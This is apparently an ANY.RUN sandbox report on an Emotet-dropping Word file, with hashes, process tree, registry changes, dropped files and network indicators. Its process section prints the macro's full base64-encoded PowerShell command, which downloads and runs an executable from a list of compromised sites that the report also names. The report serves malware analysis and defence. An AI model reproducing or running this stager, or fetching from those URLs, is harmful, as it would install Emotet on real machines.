analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Archivo_20190918_794027.doc

Full analysis: https://app.any.run/tasks/6adb9f07-b203-471e-9462-65dacd951735
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 19, 2019, 09:30:16
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: eyeballs Credit Card Account Ports, Subject: Legacy, Author: Jazmyne Schuppe, Comments: frame context-sensitive, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 11:25:00 2019, Last Saved Time/Date: Wed Sep 18 11:25:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

EA76E41CE0A651B8DD7BE889F64AC292

SHA1:

34AA46494CC3AEBCB47357A8EE6CD751A3E49B0C

SHA256:

9DA00B02BB8F0BA042F7DEA688F6247E39F3F7F42A180555523AE26938705928

SSDEEP:

6144:Mkpm1VmTG3cBubZMHY6I2KDNTto08WQxqLkI47NSU4jJntATfDocj1jVkA+:Mkpm1VmTG3cBubZMHY6I2KDNTto08WQ+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 553.exe (PID: 3548)
      • 553.exe (PID: 2472)
      • 553.exe (PID: 3456)
      • 553.exe (PID: 924)
      • easywindow.exe (PID: 2468)
      • easywindow.exe (PID: 3432)
      • easywindow.exe (PID: 3500)
      • easywindow.exe (PID: 2372)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2512)
    • Emotet process was detected

      • 553.exe (PID: 2472)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2512)
      • 553.exe (PID: 2472)
    • Executed via WMI

      • powershell.exe (PID: 2512)
    • PowerShell script executed

      • powershell.exe (PID: 2512)
    • Creates files in the user directory

      • powershell.exe (PID: 2512)
    • Starts itself from another location

      • 553.exe (PID: 2472)
    • Application launched itself

      • easywindow.exe (PID: 2468)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2884)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2884)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Stamm
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 641
Paragraphs: 1
Lines: 4
Company: Boyer - Senger
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 547
Words: 95
Pages: 1
ModifyDate: 2019:09:18 10:25:00
CreateDate: 2019:09:18 10:25:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: frame context-sensitive
Keywords: -
Author: Jazmyne Schuppe
Subject: Legacy
Title: eyeballs Credit Card Account Ports
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
10
Malicious processes
4
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 553.exe no specs 553.exe no specs 553.exe no specs #EMOTET 553.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2884"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Archivo_20190918_794027.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2512powershell -encod JABiAGsAYQB0AGEAdwBaAD0AJwBzAHcAaQBRAEsASgA1ACcAOwAkAGIAQgBNAGoAdgBaAG4AIAA9ACAAJwA1ADUAMwAnADsAJABrAGkASABSADMASQBiAD0AJwBWADQATwBCAEMARwBYACcAOwAkAEQASwBpAE8AWABiAGsAdwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgBCAE0AagB2AFoAbgArACcALgBlAHgAZQAnADsAJABYAEkAYgA5AG0AQQA2AD0AJwBOADMARABxAE0ASAAnADsAJABaAGMAdAB6AEUARgA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAEUAYgBjAGwAaQBlAE4AdAA7ACQAcgB3AEYAMABzAEMAQwB6AD0AJwBoAHQAdABwADoALwAvAGIAcgBpAGsAZQBlAC4AYwBvAG0ALwBnAGEAbABsAGUAcgB5AC8ANABkAGMAbQBuADcAMgA0ADMAMAAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AZQBjAGgAZQBsAG8AbgBhAC4AbgBlAHQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdAB5AGgANQA3ADcANgA5AC8AQABoAHQAdABwADoALwAvAGcAcgB1AHAAbwBlAHEALgBjAG8AbQAvAGwAZQBkAHMALwBkAGEAbAA1ADIAMwAwADEALwBAAGgAdAB0AHAAOgAvAC8AawBpAHIAcwB0AGUAbgBiAGkAagBsAHMAbQBhAC4AYwBvAG0ALwBlAGMAcAA0AC8AbQBoAGgAMgAwADMAMAA1AC8AQABoAHQAdABwADoALwAvAHAAYQBpAGYAaQAuAG4AZQB0AC8AcwBzAGYAbQAvAGIAbQA4ADQAMAAvACcALgAiAFMAUABgAGwAaQBUACIAKAAnAEAAJwApADsAJAB1AGEAVABqAGsAMABMAD0AJwBrAG0AegBjAEsAegB3ACcAOwBmAG8AcgBlAGEAYwBoACgAJABqADAAbgBvAG8ATwBpACAAaQBuACAAJAByAHcARgAwAHMAQwBDAHoAKQB7AHQAcgB5AHsAJABaAGMAdAB6AEUARgAuACIAZABgAE8AYABXAE4AbABgAE8AQQBEAEYAaQBMAGUAIgAoACQAagAwAG4AbwBvAE8AaQAsACAAJABEAEsAaQBPAFgAYgBrAHcAKQA7ACQASQBJAHYAOABIAFgAPQAnAEoAdgBiAHUAcQBIADAAaQAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQB0ACcAKwAnAGUAbQAnACkAIAAkAEQASwBpAE8AWABiAGsAdwApAC4AIgBMAGUAbgBgAEcAdABIACIAIAAtAGcAZQAgADIANAAwADQAMwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYQBgAFIAVAAiACgAJABEAEsAaQBPAFgAYgBrAHcAKQA7ACQARQA0AEoAUQBDAE0APQAnAGkAcwBGAEUAUABaACcAOwBiAHIAZQBhAGsAOwAkAHYAdQA5AFMANwBFAGwAdwA9ACcAaQBCAGYAegA2ADkAegAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABMAEEANABzAHUAegA9ACcATwBGAHEATABWAGsASgBEACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
924"C:\Users\admin\553.exe" C:\Users\admin\553.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3456"C:\Users\admin\553.exe" C:\Users\admin\553.exe553.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3548--12e39b71C:\Users\admin\553.exe553.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2472--12e39b71C:\Users\admin\553.exe
553.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2468"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe553.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3432"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3500--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2372--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 730
Read events
1 263
Write events
462
Delete events
5

Modification events

(PID) Process:(2884) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:ys!
Value:
79732100440B0000010000000000000000000000
(PID) Process:(2884) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2884) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2884) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1328742430
(PID) Process:(2884) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1328742544
(PID) Process:(2884) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1328742545
(PID) Process:(2884) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
440B00001E187DDFCC6ED50100000000
(PID) Process:(2884) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:ct!
Value:
63742100440B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2884) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:ct!
Value:
63742100440B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2884) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
2
Suspicious files
10
Text files
0
Unknown types
43

Dropped files

PID
Process
Filename
Type
2884WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8BD9.tmp.cvr
MD5:
SHA256:
2884WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51FA6147.wmfwmf
MD5:D4288E0800826368E57BF9592010ADD5
SHA256:65D335AC22C2817FF8C848137B62D93B454AE5E2CFECCD1B005B4EC4CED64C47
2884WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BF33B4CB.wmfwmf
MD5:B35A209E6DFCFC143D93F24249DF1CE2
SHA256:986DFFB4355B3AA21EFE4E3E7E7108D02DFFD23336E0357D32C43105278AA104
2884WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9CC1F783.wmfwmf
MD5:175C4216965D3664F742E82BBC69B263
SHA256:BC383C6F813A79F10A47CB94EC70A454F7AEB5B96C61391F9FAEAAA81EC20876
2884WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA4839F5.wmfwmf
MD5:EA0C9997579D3523446A8D08E957E954
SHA256:3E269C34542807668CE5D957F60623C1C8C9FABFA4C101D2E32193F502AF532A
2884WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\704F08E5.wmfwmf
MD5:2C64CC7906851654BECC58E932B54067
SHA256:74D486DBCDDC7BDE3D579CB4563C60BE8FCBEB638AB2662B4DF5FF81A1656BC7
2884WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F77C1050.wmfwmf
MD5:7BBC615196732040F2319BC784EBA98C
SHA256:BA196AB9440239F9D4EFCE582C3951102302D70A1C94C16B4C98FD8B93698FB5
2884WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B85CEADE.wmfwmf
MD5:0ADBCE2921EE82F18CCE8196C478F3DB
SHA256:AA626CAE45A76D53F3926325DFACBB19C70B789EC439093223B652A004F5C212
2884WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$chivo_20190918_794027.docpgc
MD5:51AAF485E6003F2F9E32ED4DAEC45954
SHA256:FA83445EC3F0134D31211FA505D0D435736603313614F5FDE9A36CB95AE45872
2884WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:F5C4313ED089E9A5A74686584864C00F
SHA256:133250888A0937A083CD7AF4639700E9D12083734245CBF402F5009E9F122D01
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
4
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2512
powershell.exe
GET
200
83.137.145.97:80
http://kirstenbijlsma.com/ecp4/mhh20305/
NL
executable
376 Kb
suspicious
2512
powershell.exe
GET
302
129.121.15.236:80
http://brikee.com/gallery/4dcmn72430/
US
html
227 b
suspicious
2512
powershell.exe
GET
404
185.57.197.56:80
http://grupoeq.com/leds/dal52301/
ES
html
273 b
suspicious
2512
powershell.exe
GET
200
129.121.15.236:80
http://brikee.com/cgi-sys/suspendedpage.cgi
US
html
7.12 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2512
powershell.exe
83.137.145.97:80
kirstenbijlsma.com
Duocast B.V.
NL
suspicious
2512
powershell.exe
129.121.15.236:80
brikee.com
Colo4, LLC
US
suspicious
2512
powershell.exe
185.57.197.56:80
grupoeq.com
Tecnocratica Centro de Datos, S.L.
ES
suspicious
114.79.134.129:443
D-Vois Broadband Pvt Ltd
IN
malicious

DNS requests

Domain
IP
Reputation
brikee.com
  • 129.121.15.236
suspicious
www.echelona.net
unknown
grupoeq.com
  • 185.57.197.56
suspicious
kirstenbijlsma.com
  • 83.137.145.97
suspicious

Threats

PID
Process
Class
Message
2512
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2512
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2512
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info